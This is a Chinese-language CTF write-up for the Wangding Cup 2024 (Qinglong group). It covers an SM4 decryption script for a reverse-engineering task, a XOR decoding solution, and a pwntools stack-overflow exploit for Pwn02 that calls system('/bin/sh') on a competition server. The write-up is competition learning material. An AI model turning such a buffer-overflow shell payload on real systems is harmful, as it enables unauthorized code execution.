# 网鼎杯2024-青龙组Wp
大家晚上好呀w!是今天比完赛的小鸟过来赶工的Wp,正好官方也要征求wp,小鸟就随便写点在战队里打的题目ww
今年的题目一半吧,听别的人说 crypto题目是照搬的....(小鸟叹气)
小鸟把Rev都ak惹w!(啾啾!)
题解蛮敷衍的,请各位不要太认真了!
主要是网鼎的题目没什么好说的?!!
# 1.Rev01
用Reacf打开看了一眼Apk文件,发现没什么特别的,没找到主类,去so里看
发现了SM4的特征,在网上搜集到了解密的脚本
但是用工具硬生生把密文怼出来了。
题解脚本如下:
#include <iostream>
#include <cstring>
#include "sm4.h"
using namespace std;
const unsigned char Sbox[256] = { 0xd6,0x90,0xe9,0xfe,0xcc,0xe1,0x3d,0xb7,0x16,0xb6,0x14,0xc2,0x28,0xfb,0x2c,0x05, 0x2b,0x67,0x9a,0x76,0x2a,0xbe,0x04,0xc3,0xaa,0x44,0x13,0x26,0x49,0x86,0x06,0x99, 0x9c,0x42,0x50,0xf4,0x91,0xef,0x98,0x7a,0x33,0x54,0x0b,0x43,0xed,0xcf,0xac,0x62, 0xe4,0xb3,0x1c,0xa9,0xc9,0x08,0xe8,0x95,0x80,0xdf,0x94,0xfa,0x75,0x8f,0x3f,0xa6, 0x47,0x07,0xa7,0xfc,0xf3,0x73,0x17,0xba,0x83,0x59,0x3c,0x19,0xe6,0x85,0x4f,0xa8, 0x68,0x6b,0x81,0xb2,0x71,0x64,0xda,0x8b,0xf8,0xeb,0x0f,0x4b,0x70,0x56,0x9d,0x35, 0x1e,0x24,0x0e,0x5e,0x63,0x58,0xd1,0xa2,0x25,0x22,0x7c,0x3b,0x01,0x21,0x78,0x87, 0xd4,0x00,0x46,0x57,0x9f,0xd3,0x27,0x52,0x4c,0x36,0x02,0xe7,0xa0,0xc4,0xc8,0x9e, 0xea,0xbf,0x8a,0xd2,0x40,0xc7,0x38,0xb5,0xa3,0xf7,0xf2,0xce,0xf9,0x61,0x15,0xa1, 0xe0,0xae,0x5d,0xa4,0x9b,0x34,0x1a,0x55,0xad,0x93,0x32,0x30,0xf5,0x8c,0xb1,0xe3, 0x1d,0xf6,0xe2,0x2e,0x82,0x66,0xca,0x60,0xc0,0x29,0x23,0xab,0x0d,0x53,0x4e,0x6f, 0xd5,0xdb,0x37,0x45,0xde,0xfd,0x8e,0x2f,0x03,0xff,0x6a,0x72,0x6d,0x6c,0x5b,0x51, 0x8d,0x1b,0xaf,0x92,0xbb,0xdd,0xbc,0x7f,0x11,0xd9,0x5c,0x41,0x1f,0x10,0x5a,0xd8, 0x0a,0xc1,0x31,0x88,0xa5,0xcd,0x7b,0xbd,0x2d,0x74,0xd0,0x12,0xb8,0xe5,0xb4,0xb0, 0x89,0x69,0x97,0x4a,0x0c,0x96,0x77,0x7e,0x65,0xb9,0xf1,0x09,0xc5,0x6e,0xc6,0x84, 0x18,0xf0,0x7d,0xec,0x3a,0xdc,0x4d,0x20,0x79,0xee,0x5f,0x3e,0xd7,0xcb,0x39,0x48 };
const unsigned int CK[32] = { 0x00070E12, 0x1C232A36, 0x383F464A, 0x545B626E, 0x70777E82, 0x8C939AA6, 0xA8AFB6BA, 0xC4CBD2DE, 0xE0E7EEF2, 0xFC030A16, 0x181F262A, 0x343B424E, 0x50575E62, 0x6C737A86, 0x888F969A, 0xA4ABB2BE, 0xC0C7CED2, 0xDCE3EAF6, 0xF8FF060A, 0x141B222E, 0x30373E42, 0x4C535A66, 0x686F767A, 0x848B929E, 0xA0A7AEB2, 0xBCC3CAD6, 0xD8DFE6EA, 0xF4FB020E, 0x10171E22, 0x2C333A46, 0x484F565A, 0x646B727E };
static const unsigned long FK[4] = { 0xa3b1bac6, 0x56aa3350, 0x677d9197, 0xb27022dc };
static inline unsigned char sm4Sbox(unsigned char inch) {
return Sbox[inch];
}
static unsigned long sm4CaliRk(unsigned long ka) {
unsigned long bb = 0;
unsigned char a[4], b[4];
PUT_ULONG_BE(ka, a, 0);
for (int i = 0; i < 4; ++i) b[i] = sm4Sbox(a[i]);
GET_ULONG_BE(bb, b, 0);
return bb ^ ROTL(bb, 13) ^ ROTL(bb, 23);
}
static void sm4_setkey(unsigned long SK[32], unsigned char key[16]) {
unsigned long MK[4], k[36];
for (int i = 0; i < 4; i++) GET_ULONG_BE(MK[i], key, i * 4);
for (int i = 0; i < 4; i++) k[i] = MK[i] ^ FK[i];
for (int i = 0; i < 32; i++) {
k[i + 4] = k[i] ^ sm4CaliRk(k[i + 1] ^ k[i + 2] ^ k[i + 3] ^ CK[i]);
SK[i] = k[i + 4];
}
}
void sm4_setkey_enc(sm4_context *ctx, unsigned char key[16]) {
ctx->mode = SM4_ENCRYPT;
sm4_setkey(ctx->sk, key);
}
static unsigned long sm4Lt(unsigned long ka) {
unsigned char a[4], b[4];
unsigned long bb = 0;
PUT_ULONG_BE(ka, a, 0);
for (int i = 0; i < 4; ++i) b[i] = Sbox[a[i]];
GET_ULONG_BE(bb, b, 0);
return bb ^ ROTL(bb, 2) ^ ROTL(bb, 10) ^ ROTL(bb, 18) ^ ROTL(bb, 24);
}
static unsigned long sm4F(unsigned long x0, unsigned long x1, unsigned long x2, unsigned long x3, unsigned long rk) {
return x0 ^ sm4Lt(x1 ^ x2 ^ x3 ^ rk);
}
static void sm4_one_round(unsigned long sk[32], unsigned char input[16], unsigned char output[16]) {
unsigned long ulbuf[36] = {0};
for (int i = 0; i < 4; i++) GET_ULONG_BE(ulbuf[i], input, i * 4);
for (int i = 0; i < 32; i++) ulbuf[i + 4] = sm4F(ulbuf[i], ulbuf[i + 1], ulbuf[i + 2], ulbuf[i + 3], sk[i]);
for (int i = 0; i < 4; i++) PUT_ULONG_BE(ulbuf[35 - i], output, i * 4);
}
void sm4_crypt_ecb(sm4_context *ctx, int mode, int length, unsigned char *input, unsigned char *output) {
while (length > 0) {
sm4_one_round(ctx->sk, input, output);
input += 16;
output += 16;
length -= 16;
}
}
void sm4_setkey_dec(sm4_context *ctx, unsigned char key[16]) {
ctx->mode = SM4_DECRYPT;
sm4_setkey(ctx->sk, key);
for (int i = 0; i < 16; ++i) SWAP(ctx->sk[i], ctx->sk[31 - i]);
}
void sm4_crypt_cbc(sm4_context *ctx, int mode, int length, unsigned char iv[16], unsigned char *input, unsigned char *output) {
int i;
unsigned char temp[16];
if (mode == SM4_ENCRYPT) {
while (length > 0) {
for (i = 0; i < 16; ++i) output[i] = input[i] ^ iv[i];
sm4_one_round(ctx->sk, output, output);
memcpy(iv, output, 16);
input += 16;
output += 16;
length -= 16;
}
} else {
while (length > 0) {
memcpy(temp, input, 16);
sm4_one_round(ctx->sk, input, output);
for (i = 0; i < 16; ++i) output[i] ^= iv[i];
memcpy(iv, temp, 16);
input += 16;
output += 16;
length -= 16;
}
}
}
int main() {
unsigned char key[16] = {0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef, 0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10};
unsigned char input[48] = { /* 填充输入数据 */ };
unsigned char output[48];
sm4_context ctx;
sm4_setkey_dec(&ctx, key);
sm4_crypt_ecb(&ctx, SM4_DECRYPT, 48, input, output);
cout << "解密结果:" << endl;
for (unsigned char c : output) cout << hex << (int)c << " ";
cout << endl;
return 0;
}
然后需要用别的语言写一个实现,我这里用的Python 前文中也是利用python解开的字符串
直接十六进制数组中的每个元素转换为对应的字符
a=[0x64 ,0x61, 0x31, 0x31, 0x61 ,0x36 ,0x35 ,0x34 ,0x2d, 0x36, 0x64 ,0x33 ,0x62, 0x2d, 0x34 ,0x36 ,0x34 ,0x63 ,0x2d ,0x61, 0x62, 0x31, 0x35, 0x2d ,0x37 ,0x39, 0x32, 0x36,0x31 ,0x38,0x63,0x66,0x61,0x63,0x37,0x66]
for i in a:
print(chr(i),end="")
# 2.Rev02
通过逆向拿到密钥跟数组,进行解密,后半段也在代码里,丢到cyberchef里就能出后半段

a = [0x72, 0xca, 0x70, 0x6a, 0x6a, 0xc4, 0xc2, 0xca]
decoded_chars = ''.join(chr(i // 2) for i in a)
print(decoded_chars, end="")
key = "XorrLord"
enc = [96, 9, 75, 0x13, 0x2d, 0xe, 0x14, 0x1]
decrypted_chars = ''.join(chr(enc[i] ^ ord(key[i])) for i in range(len(enc)))
print(decrypted_chars)
后半段密钥是AesMasterAesMast此过程便不再赘述
# Pwn 02
很简单的栈溢出题目,按照CTFWiki上说的示例都解开
exp:
import os
from pwn import *
import sys
from ctypes import *
io = remote('0192d712cbfe7e048a6291f5f7e62377.6fm8.dg01.ciihw.cn', 45531)
elf = ELF("./short")
system_plt = elf.plt["system"]
bin_sh = 0x0804a038 # "/bin/sh" 字符串的地址
io.sendlineafter(b"username: ", b"admin")
io.sendlineafter(b"password: ", b"admin123")
io.recvuntil(b"You will input this: ")
buff_addr = int(io.recv(10), 16) # hex
log.info("buf_add: " + hex(buff_addr))
# 构造 payload
payload = b"a" * 4
payload += p32(0x080483fa)
payload += p32(system_plt)
payload += b"aaaa"
payload += p32(bin_sh)
payload = payload.ljust(0x50, b"\x00")
payload += p32(buff_addr)
payload += p32(0x08048674)
io.sendlineafter(b"plz input your msg:\n", payload)
io.sendline(payload)
io.interactive()
# 结语
蛮好玩的题目,几个队友没啥作用也没啥事,但是crypto只改了个背景就当题目也太敷衍了....//
夏鸢还在等她的Ena,呜呜呜

我不想去外地打比赛~!(小鸟啾啾以视抗议!